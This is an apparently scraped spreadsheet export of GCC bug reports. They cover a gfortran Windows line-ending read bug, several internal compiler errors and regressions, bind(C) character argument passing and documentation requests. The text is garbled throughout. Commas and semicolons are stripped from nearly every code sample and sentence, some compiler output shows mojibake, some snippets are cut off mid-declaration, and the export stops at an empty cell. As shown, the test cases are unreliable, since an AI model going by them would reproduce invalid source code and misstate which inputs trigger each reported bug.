integerparameter :: isize=12
integerparameter :: funit=12
integer :: i
double precision dimension(isize) :: a
do i=1isize
 a(i)=dble(i)
enddo
write(6*)'Value to write'
do i=1isize
 write(6*)a(i)
enddo
open(funitfile='test.txt')
write(funit'(1x6(f25.20''''))') (a(i)i=1isize)
close(funit)
do i=1isize
 a(i)=0d0
enddo
open(funitfile='test.txt')
read(funit*) (a(i)i=1isize)
close(funit)
write(6*)'Values after read'
do i=1isize
 write(6*)a(i)
enddo
end
And compiled with:
x86_64-w64-mingw32.static-gfortran test.f90
On Linux the values 1-12 are read but on Windows the values 1-607-11 are read. It seems that the file is written with Windows line endings on Windows but when read Linux line endings are expected. I think it should be consistent at least one should be able to read files back on the same system they are generated.
I grepped through a recent 5.3.0 tarball and it's a bit of a guess but in libgfortran/io/transfer.c the function next_record_r() knows only about '\n' line endings yet it's opposite number next_record_w() knows about both '\n' and '\r' - so perhaps the same logic just needs copying to the read function?</t>
  </si>
  <si>
    <t>ajmay81</t>
  </si>
  <si>
    <t>GCC-31160</t>
  </si>
  <si>
    <t>%VAL and related features need to be documented.</t>
  </si>
  <si>
    <t>As in the subject line this feature was added (thanks Paul!) but the documentation is still pending.</t>
  </si>
  <si>
    <t>brooks</t>
  </si>
  <si>
    <t>GCC-32732</t>
  </si>
  <si>
    <t>[Bind C] Character scalars are passed as arrays</t>
  </si>
  <si>
    <t>|  subroutine foo(a) bind(c)
|    character(len=1kind=c_char) value :: a
Has a single scalar argument a in C notation:
| void foo(char a)
gfortran however uses
| void foo(char a[]) 
with length one.
This causes problems on IA-64 HP-UX see thread starting at
http://gcc.gnu.org/ml/fortran/2007-07/msg00210.html
(If a is a scalar one needs to audit also all character uses to make sure that one does use it as such (and does not compile Fortran if(a /= 5) into C if(*a != 5) as a is not a pointer.)
Additionally If the function is called the length is additionally passed to the function:
| call foo(a)
produces:
| foo(a 1) // 'a' array not zero terminated
instead of
| foo('a')
As the length arguments come always last and are not used this seems to be harmless but there might be platforms or scenarios where they may cause problems.</t>
  </si>
  <si>
    <t>GCC-3634</t>
  </si>
  <si>
    <t>partial specialization envolving nested classes is broken</t>
  </si>
  <si>
    <t>A partial specialization of a class template whose
parameter is a nested class of another class template
is never chosen for instantiation. Explicit specializations
don't seem to suffer from this bug.
Release:
3.0
Environment:
UltraSPARC 10 Solaris 8
How-To-Repeat:
Compile and run the attached code. If everything were
correct it should print:
partial spec
explicit spec</t>
  </si>
  <si>
    <t>gawrilow</t>
  </si>
  <si>
    <t>GCC-4393</t>
  </si>
  <si>
    <t>can't build QT using g++ 2.9-aix43-010414</t>
  </si>
  <si>
    <t>g++ -c -Wall -W -O2 -mminimal-toc -D_THREAD_SAFE -DQT_THREAD_SUPPORT -DQT_NO_XINERAMA -DQT_NO
_XRENDER -DQT_NO_XFTFREETYPE -DQT_NO_XKB -DQT_NO_IMAGEIO_MNG -DQT_NO_IMAGEIO_JPEG -DQT_NO_STYLE_AQUA 
-DQT_NO_STYLE_MAC -DQT_NO_STYLE_INTERLACE -DQT_NO_STYLE_COMPACT -DQT_NO_DEBUG -DQT_THREAD_SUPPORT -I3
rdparty/libpng -I3rdparty/zlib -I/afs/haifa/proj6/namc/personal/shapir/qt/include -I/usr/X11R6/includ
e -I.moc/release-mt/ -I/afs/haifa/proj6/namc/personal/shapir/qt/mkspecs/aix-g++ -o .obj/release-mt/qc
ursor_x11.o kernel/qcursor_x11.cpp
kernel/qcursor_x11.cpp: In method `void QCursor::update () const':
kernel/qcursor_x11.cpp:489: Internal compiler error in `expand_expr' at expr.c:5990
Please submit a full bug report.
See  for instructions.
make: The error code from the last command is 1.
Stop.
make: The error code from the last command is 2.
Stop.
make: The error code from the last command is 2.
Release:
gcc version 2.9-aix43-010414
Environment:
AIX 4.3.3</t>
  </si>
  <si>
    <t>shapir</t>
  </si>
  <si>
    <t>GCC-68060</t>
  </si>
  <si>
    <t>[6 Regression] ICE on valid code at -O3 on x86_64-linux-gnu in vect_get_vec_def_for_operand at tree-vect-stmts.c:1413</t>
  </si>
  <si>
    <t>The following code causes an ICE when compiled with the current gcc trunk at -O3 on x86_64-linux-gnu in both 32-bit and 64-bit modes.
It is a regression from 5.2.x.
$ gcc-trunk -v
Using built-in specs.
COLLECT_GCC=gcc-trunk
COLLECT_LTO_WRAPPER=/usr/local/gcc-trunk/libexec/gcc/x86_64-pc-linux-gnu/6.0.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: ../gcc-trunk/configure --prefix=/usr/local/gcc-trunk --enable-languages=cc++ --disable-werror --enable-multilib
Thread model: posix
gcc version 6.0.0 20151021 (experimental) [trunk revision 229137] (GCC) 
$ 
$ gcc-trunk -O2 small.c ./a.out
$ gcc-5.2 -O3 small.c ./a.out
$ 
$ gcc-trunk -O3 small.c
small.c: In function â€˜mainâ€™:
small.c:4:1: internal compiler error: in vect_get_vec_def_for_operand at tree-vect-stmts.c:1413
 main ()
 ^
0xd07273 vect_get_vec_def_for_operand(tree_node* gimple*)
	../../gcc-trunk/gcc/tree-vect-stmts.c:1413
0xd077e1 vect_get_vec_defs(tree_node* tree_node* gimple* vec* vec* _slp_tree* int)
	../../gcc-trunk/gcc/tree-vect-stmts.c:1568
0xd102c0 vectorizable_operation
	../../gcc-trunk/gcc/tree-vect-stmts.c:4894
0xd1d956 vect_transform_stmt(gimple* gimple_stmt_iterator* bool* _slp_tree* _slp_instance*)
	../../gcc-trunk/gcc/tree-vect-stmts.c:7690
0xd23b73 vect_transform_loop(_loop_vec_info*)
	../../gcc-trunk/gcc/tree-vect-loop.c:6134
0xd3e6c7 vectorize_loops()
	../../gcc-trunk/gcc/tree-vectorizer.c:512
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$ 
--------------------------------------
int a b c
int
main ()
{
  for ( c c++)
    for (a = 0 a &lt; 4 a++)
      {
	c 
	for (b = 0 b &lt; 2 b++)
	  c |= 1
      }
  return 0 
}</t>
  </si>
  <si>
    <t>GCC-54528</t>
  </si>
  <si>
    <t>[4.8 Regression] system.h:288:78: error: integer overflow in expression</t>
  </si>
  <si>
    <t>Created attachment 28153
Preprocessed source
/home/dave/gnu/gcc/objdir/./prev-gcc/g++ -B/home/dave/gnu/gcc/objdir/./prev-gcc/
 -B/home/dave/opt/gnu/gcc/gcc-4.8.0/hppa-linux-gnu/bin/ -nostdinc++ -B/home/dave
/gnu/gcc/objdir/prev-hppa-linux-gnu/libstdc++-v3/src/.libs -B/home/dave/gnu/gcc/
objdir/prev-hppa-linux-gnu/libstdc++-v3/libsupc++/.libs -I/home/dave/gnu/gcc/obj
dir/prev-hppa-linux-gnu/libstdc++-v3/include/hppa-linux-gnu -I/home/dave/gnu/gcc
/objdir/prev-hppa-linux-gnu/libstdc++-v3/include -I/home/dave/gnu/gcc/gcc/libstdc++-v3/libsupc++ -L/home/dave/gnu/gcc/objdir/prev-hppa-linux-gnu/libstdc++-v3/sr
c/.libs -L/home/dave/gnu/gcc/objdir/prev-hppa-linux-gnu/libstdc++-v3/libsupc++/.
libs -c   -g -O2 -DIN_GCC   -fno-exceptions -fno-rtti -W -Wall -Wno-narrowing -W
write-strings -Wcast-qual -Wmissing-format-attribute -pedantic -Wno-long-long -W
no-variadic-macros -Wno-overlength-strings -Werror -fno-common  -DHAVE_CONFIG_H 
-I. -I. -I../../gcc/gcc -I../../gcc/gcc/. -I../../gcc/gcc/../include -I../../gcc
/gcc/../libcpp/include  -I../../gcc/gcc/../libdecnumber -I../../gcc/gcc/../libde
cnumber/dpd -I../libdecnumber    ../../gcc/gcc/mcf.c -o mcf.o
In file included from ../../gcc/gcc/mcf.c:47:0:
../../gcc/gcc/mcf.c: In function â€˜void dump_fixup_edge(FILE* fixup_graph_type* fixup_edge_p)â€™:
../../gcc/gcc/system.h:288:78: error: integer overflow in expression [-Werror=overflow]
                              ? ~ (t) 0 &lt;&lt; (sizeof(t) * CHAR_BIT - 1) : (t) 0))
                                                                              ^
../../gcc/gcc/system.h:289:44: note: in expansion of macro 'INTTYPE_MINIMUM'
 #define INTTYPE_MAXIMUM(t) ((t) (~ (t) 0 - INTTYPE_MINIMUM (t)))
                                            ^
../../gcc/gcc/mcf.c:55:22: note: in expansion of macro 'INTTYPE_MAXIMUM'
 #define CAP_INFINITY INTTYPE_MAXIMUM (HOST_WIDEST_INT)
                      ^
../../gcc/gcc/mcf.c:211:34: note: in expansion of macro 'CAP_INFINITY'
       if (fedge-&gt;max_capacity == CAP_INFINITY)
                                  ^
../../gcc/gcc/system.h:288:78: error: integer overflow in expression [-Werror=overflow]
                              ? ~ (t) 0 &lt;&lt; (sizeof(t) * CHAR_BIT - 1) : (t) 0))
                                                                              ^
../../gcc/gcc/system.h:289:44: note: in expansion of macro 'INTTYPE_MINIMUM'
 #define INTTYPE_MAXIMUM(t) ((t) (~ (t) 0 - INTTYPE_MINIMUM (t)))
                                            ^
../../gcc/gcc/mcf.c:55:22: note: in expansion of macro 'INTTYPE_MAXIMUM'
 #define CAP_INFINITY INTTYPE_MAXIMUM (HOST_WIDEST_INT)
                      ^
../../gcc/gcc/mcf.c:219:27: note: in expansion of macro 'CAP_INFINITY'
       if (fedge-&gt;rflow == CAP_INFINITY)
                           ^
../../gcc/gcc/mcf.c: In function â€˜void create_fixup_graph(fixup_graph_type*)â€™:
../../gcc/gcc/system.h:288:78: error: integer overflow in expression [-Werror=overflow]
                              ? ~ (t) 0 &lt;&lt; (sizeof(t) * CHAR_BIT - 1) : (t) 0))
                                                                              ^
../../gcc/gcc/system.h:289:44: note: in expansion of macro 'INTTYPE_MINIMUM'
 #define INTTYPE_MAXIMUM(t) ((t) (~ (t) 0 - INTTYPE_MINIMUM (t)))
                                            ^
../../gcc/gcc/mcf.c:55:22: note: in expansion of macro 'INTTYPE_MAXIMUM'
 #define CAP_INFINITY INTTYPE_MAXIMUM (HOST_WIDEST_INT)
                      ^
../../gcc/gcc/mcf.c:531:28: note: in expansion of macro 'CAP_INFINITY'
                     fcost CAP_INFINITY)
                            ^
../../gcc/gcc/system.h:288:78: error: integer overflow in expression [-Werror=overflow]
                              ? ~ (t) 0 &lt;&lt; (sizeof(t) * CHAR_BIT - 1) : (t) 0))
                                                                              ^
../../gcc/gcc/system.h:289:44: note: in expansion of macro 'INTTYPE_MINIMUM'
 #define INTTYPE_MAXIMUM(t) ((t) (~ (t) 0 - INTTYPE_MINIMUM (t)))
                                            ^
../../gcc/gcc/mcf.c:55:22: note: in expansion of macro 'INTTYPE_MAXIMUM'
 #define CAP_INFINITY INTTYPE_MAXIMUM (HOST_WIDEST_INT)
                      ^
../../gcc/gcc/mcf.c:543:23: note: in expansion of macro 'CAP_INFINITY'
                       CAP_INFINITY)
                       ^
../../gcc/gcc/mcf.c: In function â€˜bool cancel_negative_cycle(fixup_graph_type* int* gcov_type* int*)â€™:
../../gcc/gcc/system.h:288:78: error: integer overflow in expression [-Werror=overflow]
                              ? ~ (t) 0 &lt;&lt; (sizeof(t) * CHAR_BIT - 1) : (t) 0))
                                                                              ^
../../gcc/gcc/system.h:289:44: note: in expansion of macro 'INTTYPE_MINIMUM'
 #define INTTYPE_MAXIMUM(t) ((t) (~ (t) 0 - INTTYPE_MINIMUM (t)))
                                            ^
../../gcc/gcc/mcf.c:55:22: note: in expansion of macro 'INTTYPE_MAXIMUM'
 #define CAP_INFINITY INTTYPE_MAXIMUM (HOST_WIDEST_INT)
                      ^
../../gcc/gcc/mcf.c:806:14: note: in expansion of macro 'CAP_INFINITY'
       d[i] = CAP_INFINITY
              ^
../../gcc/gcc/system.h:288:78: error: integer overflow in expression [-Werror=overflow]
                              ? ~ (t) 0 &lt;&lt; (sizeof(t) * CHAR_BIT - 1) : (t) 0))
                                                                              ^
../../gcc/gcc/system.h:289:44: note: in expansion of macro 'INTTYPE_MINIMUM'
 #define INTTYPE_MAXIMUM(t) ((t) (~ (t) 0 - INTTYPE_MINIMUM (t)))
                                            ^
../../gcc/gcc/mcf.c:55:22: note: in expansion of macro 'INTTYPE_MAXIMUM'
 #define CAP_INFINITY INTTYPE_MAXIMUM (HOST_WIDEST_INT)
                      ^
../../gcc/gcc/mcf.c:822:34: note: in expansion of macro 'CAP_INFINITY'
             &amp;&amp; d[pfedge-&gt;src] != CAP_INFINITY
                                  ^
../../gcc/gcc/system.h:288:78: error: integer overflow in expression [-Werror=overflow]
                              ? ~ (t) 0 &lt;&lt; (sizeof(t) * CHAR_BIT - 1) : (t) 0))
                                                                              ^
../../gcc/gcc/system.h:289:44: note: in expansion of macro 'INTTYPE_MINIMUM'
 #define INTTYPE_MAXIMUM(t) ((t) (~ (t) 0 - INTTYPE_MINIMUM (t)))
                                            ^
../../gcc/gcc/mcf.c:55:22: note: in expansion of macro 'INTTYPE_MAXIMUM'
 #define CAP_INFINITY INTTYPE_MAXIMUM (HOST_WIDEST_INT)
                      ^
../../gcc/gcc/mcf.c:845:32: note: in expansion of macro 'CAP_INFINITY'
           &amp;&amp; d[pfedge-&gt;src] != CAP_INFINITY
                                ^
../../gcc/gcc/system.h:288:78: error: integer overflow in expression [-Werror=overflow]
                              ? ~ (t) 0 &lt;&lt; (sizeof(t) * CHAR_BIT - 1) : (t) 0))
                                                                              ^
../../gcc/gcc/system.h:289:44: note: in expansion of macro 'INTTYPE_MINIMUM'
 #define INTTYPE_MAXIMUM(t) ((t) (~ (t) 0 - INTTYPE_MINIMUM (t)))
                                            ^
../../gcc/gcc/mcf.c:55:22: note: in expansion of macro 'INTTYPE_MAXIMUM'
 #define CAP_INFINITY INTTYPE_MAXIMUM (HOST_WIDEST_INT)
                      ^
../../gcc/gcc/mcf.c:886:16: note: in expansion of macro 'CAP_INFINITY'
   cycle_flow = CAP_INFINITY
                ^
../../gcc/gcc/mcf.c: In function â€˜gcov_type find_max_flow(fixup_graph_type* int int)â€™:
../../gcc/gcc/system.h:288:78: error: integer overflow in expression [-Werror=overflow]
                              ? ~ (t) 0 &lt;&lt; (sizeof(t) * CHAR_BIT - 1) : (t) 0))
                                                                              ^
../../gcc/gcc/system.h:289:44: note: in expansion of macro 'INTTYPE_MINIMUM'
 #define INTTYPE_MAXIMUM(t) ((t) (~ (t) 0 - INTTYPE_MINIMUM (t)))
                                            ^
../../gcc/gcc/mcf.c:55:22: note: in expansion of macro 'INTTYPE_MAXIMUM'
 #define CAP_INFINITY INTTYPE_MAXIMUM (HOST_WIDEST_INT)
                      ^
../../gcc/gcc/mcf.c:1056:29: note: in expansion of macro 'CAP_INFINITY'
       gcov_type increment = CAP_INFINITY
                             ^
cc1plus: all warnings being treated as errors
make[3]: *** [mcf.o] Error 1
dave@mx3210:~/gnu/gcc/objdir/prev-gcc$ ./xgcc -B./ -v
Reading specs from ./specs
COLLECT_GCC=./xgcc
COLLECT_LTO_WRAPPER=./lto-wrapper
Target: hppa-linux-gnu
Configured with: ../gcc/configure --with-gnu-as --with-gnu-ld --enable-shared --enable-multiarch --with-multiarch-defaults=hppa-linux-gnu --enable-linker-build-id --build=hppa-linux-gnu --host=hppa-linux-gnu --target=hppa-linux-gnu --prefix=/home/dave/opt/gnu/gcc/gcc-4.8.0 --with-local-prefix=/home/dave/opt/gnu --enable-threads=posix --enable-__cxa_atexit --build=hppa-linux-gnu --enable-clocale=gnu --enable-java-gc=boehm --without-cloog --without-ppl --enable-languages=cc++objcfortranobj-c++javaadalto
Thread model: posix
gcc version 4.8.0 20120908 (experimental) [trunk revision 191088] (GCC)</t>
  </si>
  <si>
    <t>GCC-63366</t>
  </si>
  <si>
    <t>C++ __complex is not equivalent to __complex double</t>
  </si>
  <si>
    <t>Created attachment 33559
Testcase showing that __complex is not equivalent to __complex double in C++
In function grokdeclarator () in cp/decl.c there is the following comment:
      /* If we just have complex it is equivalent to
         complex double but if any modifiers at all are specified it is
         the complex form of TYPE.  E.g complex short is
         complex short int.  */
However in practice __complex is equivalent to __complex int. The attached testcase shows the problem and can be modified to try against __complex int.
Best regards.</t>
  </si>
  <si>
    <t>GCC-45295</t>
  </si>
  <si>
    <t>intrinsic.texi: SELECTED_CHAR_KIND should mention wide-char support</t>
  </si>
  <si>
    <t>http://gcc.gnu.org/onlinedocs/gfortran/SELECTED_005fCHAR_005fKIND.html
only mentions DEFAULT and ASCII it should also include ISO_10646 and possibly some example for it.
Possible example (requires an UTF-8 terminal):
use iso_fortran_env
implicit none
integer parameter :: wc = selected_char_kind('ISO_10646')
integer parameter :: ac = selected_char_kind('ASCII')
character(kind=wclen=20) :: hello4
character(kind=aclen=20) :: hello1
hello1 = ac_'Hello'
hello4 = wc_'Hello and '//char(int(z'4F60')wc)//char(int(z'597D')wc)
open(output_unitencoding='utf-8')
write(*'(5a)') '&gt;'trim(hello1)'&lt;'
write(*'(3a)') '&gt;'trim(hello4)'&lt;'
end</t>
  </si>
  <si>
    <t>GCC-25798</t>
  </si>
  <si>
    <t>[4.2 Regression] ICE with -O1 -fmodulo-sched -ftracer</t>
  </si>
  <si>
    <t>Attached code when compiled by gcc version 4.2.0 20060113 (experimental) using
----------
gcc -O1 -fmodulo-sched -ftracer -c insmod.c -o insmod.o
----------
fails like this:
----------
insmod.c: In function main:
insmod.c:143: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
----------
Tested only on x86. It is a regression since it works on gcc version 4.2.0 20051224 (experimental).</t>
  </si>
  <si>
    <t>GCC-50585</t>
  </si>
  <si>
    <t>[4.6/4.7 Regression] ICE with assumed length character array argument</t>
  </si>
  <si>
    <t>Compiling these 2 routines in the same source file with gfortran -c
      SUBROUTINE SUB1( str )
      IMPLICIT NONE
      CHARACTER(len=*) :: str(2)
      CALL SUB2( str(1)(:3) )
      END SUBROUTINE SUB1
      SUBROUTINE SUB2( str )
      IMPLICIT NONE
      CHARACTER(*) :: str
      END SUBROUTINE SUB2
gives this ICE:
f951: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
with gfortran 4.6.1 on Fedora 15 (x64) and with MinGW on Win32.
The problem was also observed on 4.6.0 on Fedora 15 but was not seen on 4.5.x.
The ICE does not occur if any of these are true:
 -fno-whole-file is used
 The routines are in separate files 
 The str array is changed to a scalar
 The str length is changed to a constant</t>
  </si>
  <si>
    <t>sgm</t>
  </si>
  <si>
    <t>GCC-37325</t>
  </si>
  <si>
    <t>[4.4 Regression] Visibility test fails</t>
  </si>
  <si>
    <t>FAIL: gcc.dg/visibility-14.c scan-hidden hidden[ \t_]*foo
FAIL: gcc.dg/visibility-15.c scan-hidden hidden[ \t_]*foo
FAIL: gcc.dg/visibility-16.c scan-hidden hidden[ \t_]*foo
FAIL: gcc.dg/visibility-17.c scan-hidden hidden[ \t_]*foo
FAIL: gcc.dg/visibility-18.c scan-hidden hidden[ \t_]*foo
FAIL: gcc.dg/visibility-19.c scan-hidden hidden[ \t_]*foo</t>
  </si>
  <si>
    <t>GCC-37450</t>
  </si>
  <si>
    <t>[4.4 Regression] C++ FE times out on duplicated parameter</t>
  </si>
  <si>
    <t>On Linux/x86 trunk revision 140155 is miscompiled. The
following test timed out
[hjl@gnu-33 gcc]$ cat /tmp/x.ii
void foo (int a int a) { }
[hjl@gnu-33 gcc]$ ./xgcc -B./  -ansi -pedantic-errors -Wno-long-long  -S /tmp/x.ii
/tmp/x.ii:1: error: redefinition of â€˜int aâ€™
/tmp/x.ii:1: error: â€˜int aâ€™ previously declared here
Ctrl-C
[hjl@gnu-33 gcc]$
make check shows
Executing on host: /export/gnu/import/svn/gcc-test/bld/gcc/testsuite/g++/../../g++ -B/export/gnu/import/svn/gcc-test/bld/gcc/testsuite/g++/../../  -nostdinc++ -I/export/gnu/import/svn/gcc-test/bld/x86_64-unknown-linux-gnu/32/libstdc++-v3/include/x86_64-unknown-linux-gnu -I/export/gnu/import/svn/gcc-test/bld/x86_64-unknown-linux-gnu/32/libstdc++-v3/include -I/export/gnu/import/svn/gcc-test/src-trunk/libstdc++-v3/libsupc++ -I/export/gnu/import/svn/gcc-test/src-trunk/libstdc++-v3/include/backward -I/export/gnu/import/svn/gcc-test/src-trunk/libstdc++-v3/testsuite/util -fmessage-length=0   -ansi -pedantic-errors -Wno-long-long  -c  -m32 -o warn4.o /export/gnu/import/svn/gcc-test/src-trunk/gcc/testsuite/g++.old-deja/g++.mike/warn4.C    (timeout = 300)
/export/gnu/import/svn/gcc-test/src-trunk/gcc/testsuite/g++.old-deja/g++.mike/warn4.C:2: error: redefinition of 'int a'^M
/export/gnu/import/svn/gcc-test/src-trunk/gcc/testsuite/g++.old-deja/g++.mike/warn4.C:2: error: 'int a' previously declared here^M
WARNING: program timed out.
compiler exited with status 1
Patch for PR 37377 seems to fix this.</t>
  </si>
  <si>
    <t>GCC-42963</t>
  </si>
  <si>
    <t>[4.5 Regression] Redundant switch labels not cleaned up anymore</t>
  </si>
  <si>
    <t>Test case is taken from bug 18046:
-----------------------------------------------------
extern void foo (void)
extern int i
void
bar (void)
{
  switch (i)
    {
    case 0:
      foo ()
      break
    case 1:
      break
    }
  switch (i)
    {
    case 0:
      foo ()
      break
    case 1:
      break
    }
}
-----------------------------------------------------
the .012t.cfg dump with trunk (r156492) today looks like this:
bar ()
{
  int i.0
:
  i.0 = i
  switch (i.0)  case 0:  case 1: &gt;
:
  foo ()
:
  i.0 = i
  switch (i.0)  case 0:  case 1: &gt;
:
  foo ()
:
  return
}
The dump with gcc (Debian 4.3.4-5) 4.3.4 looks better:
bar ()
{
  int i.0
  # BLOCK 2
  # PRED: ENTRY (fallthru)
  i.0 = i
  switch (i.0)
    {
      case 0: goto 
      default : goto 
    }
  # SUCC: 3 4
  # BLOCK 3
  # PRED: 2
:
  foo ()
  # SUCC: 4 (fallthru)
  # BLOCK 4
  # PRED: 2 3 (fallthru)
:
  i.0 = i
  switch (i.0)
    {
      case 0: goto 
      default : goto 
    }
  # SUCC: 5 6
  # BLOCK 5
  # PRED: 4
:
  foo ()
  # SUCC: 6 (fallthru)
  # BLOCK 6
  # PRED: 4 5 (fallthru)
:
  return
  # SUCC: EXIT
}
Note how GCC 4.5 fails to clean up  the case 1 label.  The label is retained all the way through the .137t.nrv dump (at -O2) and only disappears in the .139t.optimized dump.
This confuses things in a couple of places and costs memory for no reason.</t>
  </si>
  <si>
    <t>GCC-26963</t>
  </si>
  <si>
    <t>ICE with -fipa-pta and templates</t>
  </si>
  <si>
    <t>The following testcase crashes the compiler when compiled with -fipa-pta:
======================================
struct A
{
    int i j
}
A foo(A)
template A bar(A a) { return foo(a) }
void baz()
{
    bar(A())
}
======================================
bug.cc: In function 'void baz(B&amp;)':
bug.cc:12: internal compiler error: Segmentation fault
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-79730</t>
  </si>
  <si>
    <t>[5/6/7 Regression] ICE tree check: expected var_decl have function_decl in finish_decl at c/c-decl.c:5063</t>
  </si>
  <si>
    <t>Affects versions down to 4.9 (configured with --enable-checking=yes) :
$ cat z1.c
register int x() asm (x)
$ cat z2.c
register float x() asm (x())
$ gcc-7-20170226 -c z1.c
z1.c:1:14: error: invalid storage class for function 'x'
 register int x() asm (x)
              ^
z1.c:1:1: internal compiler error: tree check: expected var_decl have function_decl in finish_decl at c/c-decl.c:5063
 register int x() asm (x)
 ^~~~~~~~
0xea2fcc tree_check_failed(tree_node const* char const* int char const* ...)
        ../../gcc/tree.c:9815
0x668f71 tree_check(tree_node* char const* int char const* tree_code)
        ../../gcc/tree.h:3064
0x668f71 finish_decl(tree_node* unsigned int tree_node* tree_node* tree_node*)
        ../../gcc/c/c-decl.c:5063
0x6cf8b6 c_parser_declaration_or_fndef
        ../../gcc/c/c-parser.c:1971
0x6d87fb c_parser_external_declaration
        ../../gcc/c/c-parser.c:1468
0x6d9259 c_parser_translation_unit
        ../../gcc/c/c-parser.c:1348
0x6d9259 c_parse_file()
        ../../gcc/c/c-parser.c:18173
0x737b02 c_common_parse_file()
        ../../gcc/c-family/c-opts.c:1107</t>
  </si>
  <si>
    <t>GCC-54787</t>
  </si>
  <si>
    <t>Inconsistent -Wtype-limits warning for different-sized bitfields</t>
  </si>
  <si>
    <t>For the attached test-case GCC warns inconsistently: it warns when the bit-field is 8 bits but not 7 nor 9 bits.  The c++ front-end warns consistently for all three lines.  Observed with trunk r191987 the 4.7 branch (r191916 post 4.7.2) the 4.6 branch (r191812 post4.6.3) as well as local imports from the 4.3-branch and the host compiler gcc-4.4.3-4.fc12.x86_64).  Other targets include crisv32-axis-linux-gnu and mipsisa32r2el-linux-gnu.
Example output (note absence of warnings for lines 28 and 30):
gcc -Wtype-limits -O2 -c range.c
/n/pp_slask/hp/range.c: In function 'main':
/n/pp_slask/hp/range.c:29: warning: comparison is always true due to limited range of data type
There's a related need to turn off the warning per-expression to avoid the need to turn it off per-file (by adding -Wno-error=type-limits to compilations using the common idiom of -Werror together with warnings that include -Wtype-limits).</t>
  </si>
  <si>
    <t>GCC-9527</t>
  </si>
  <si>
    <t>gcc-3.2.1 stringstreams and hidden linux glibc dependencies</t>
  </si>
  <si>
    <t xml:space="preserve">From: Benjamin Kosnik 
To: paolo@gcc.gnu.org bkoz@redhat.com gcc-bugs@gcc.gnu.org
	gcc-prs@gcc.gnu.org nobody@gcc.gnu.org
	o.flebbe@science-computing.de gcc-gnats@gcc.gnu.org
Cc: paolo@gcc.gnu.org gcc-bugs@gcc.gnu.org gcc-prs@gcc.gnu.org
	nobody@gcc.gnu.org o.flebbe@science-computing.de
Subject: Re: libstdc++/9527: gcc-3.2.1 strstreams and hidden linux glibc
 dependencies
Date: Fri 31 Jan 2003 09:58:00 -0600
 On 31 Jan 2003 15:51:23 -0000
 paolo@gcc.gnu.org wrote:
 &gt;Synopsis: gcc-3.2.1 strstreams and hidden linux glibc dependencies
 &gt;
 &gt;State-Changed-From-To: open-&gt;analyzed
 &gt;State-Changed-By: paolo
 &gt;State-Changed-When: Fri Jan 31 15:51:23 2003
 &gt;State-Changed-Why:
 &gt;    Well glibc2.2.5 was released more than 1 year ago:
 &gt;    http://sources.redhat.com/ml/libc-announce/2002/msg00000.html
 &gt;    and current distributions mostly ship with glibc2.3.x.
 &gt;    I think we don't really support anything older than 2.2.5...
 &gt;    Benjamin?
 &gt;
 &gt;http://gcc.gnu.org/cgi-bin/gnatsweb.pl?cmd=view%20audit-trail&amp;database=gcc&amp;pr=9527
 strstreams in general is the lowest priority of any bug on the C++
 runtime. The only thing that could make it even less of a priority is a
 known problem with old glibcs.
 Using both in combination when superior solutions exist for both seems
 to be asking for problems. No begging.
 :)
 -benjamin
</t>
  </si>
  <si>
    <t>GCC-28705</t>
  </si>
  <si>
    <t>[4.1 Regression] ICE: in type_dependent_expression_p at cp/pt.c:12837</t>
  </si>
  <si>
    <t>As reported at:
https://sourceforge.net/tracker/?func=detail&amp;atid=102435&amp;aid=1539256&amp;group_id=2435
This testcase:
=====================================================================
namespace N
{
	struct s { }
	template struct tplt { void mf(const T 
	tplt 
}
template bool g()
{
	N::s *p = 0
	N::f().mf(s(p))
	return true
}
====================================================================
ICES with
cfg.C: In function 'bool g()':
cfg.C:12: internal compiler error: in type_dependent_expression_p at cp/pt.c:12837
This is with 
GNU C++ version 4.2.0 20060808 (experimental) (mingw32)
It also ICES with gcc-3.4.5
Danny</t>
  </si>
  <si>
    <t>dannysmith</t>
  </si>
  <si>
    <t>GCC-40475</t>
  </si>
  <si>
    <t>[4.5 Regression] gcc.dg/vect/vect-nest-cycle-[12].c</t>
  </si>
  <si>
    <t>On Linux/ia64 revision 148518 gave:
FAIL: gcc.dg/vect/vect-nest-cycle-1.c scan-tree-dump-times vect OUTER LOOP VECTORIZED 1
FAIL: gcc.dg/vect/vect-nest-cycle-2.c scan-tree-dump-times vect OUTER LOOP VECTORIZED 1
Revision 148510 is OK.</t>
  </si>
  <si>
    <t>GCC-37789</t>
  </si>
  <si>
    <t>[4.4 regression] ICE with __FUNCTION__</t>
  </si>
  <si>
    <t>The following invalid code snippet triggers an ICE on mainline:
===================
void foo():
{
  __FUNCTION__
}
===================
bug.cc: In function 'void foo()':
bug.cc:2: error: only constructors take base initializers
bug.cc:2: error: expected identifier before '{' token
bug.cc:2: warning: extended initializer lists only available with -std=c++0x or -std=gnu++0x
cc1plus: internal compiler error: Segmentation fault
Please submit a full bug report [etc.]
The regression was introduced between 2008-06-26 and 2008-07-05.</t>
  </si>
  <si>
    <t>GCC-52298</t>
  </si>
  <si>
    <t>ICE: verify_ssa failed: definition in block follows use</t>
  </si>
  <si>
    <t>regehr@gamow 4]$ current-gcc -O3 -c small.c
small.c: In function 'fn1':
small.c:6:1: error: definition in block 4 follows the use
for SSA_NAME: vect_cst_.18_24 in statement:
vect_var_.19_37 = VEC_PERM_EXPR 
small.c:6:1: internal compiler error: verify_ssa failed
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
[regehr@gamow 4]$ cat small.c
int a b c h
int i[5][5]
void
fn1 ()
{
  int l = 0
  for (a = 0 a &lt;= 3 a++)
    for (b = 1 b &gt;= 0 b -= 1)
      l |= i[0][b]
  c = l
}
[regehr@gamow 4]$ current-gcc -v
Using built-in specs.
COLLECT_GCC=current-gcc
COLLECT_LTO_WRAPPER=/uusoc/exports/scratch/regehr/z/compiler-install/gcc-r184342-install/bin/../libexec/gcc/x86_64-unknown-linux-gnu/4.7.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../configure --with-libelf=/usr/local --enable-lto --prefix=/home/regehr/z/compiler-install/gcc-r184342-install --program-prefix=r184342- --enable-languages=cc++
Thread model: posix
gcc version 4.7.0 20120217 (experimental) (GCC)</t>
  </si>
  <si>
    <t>GCC-56181</t>
  </si>
  <si>
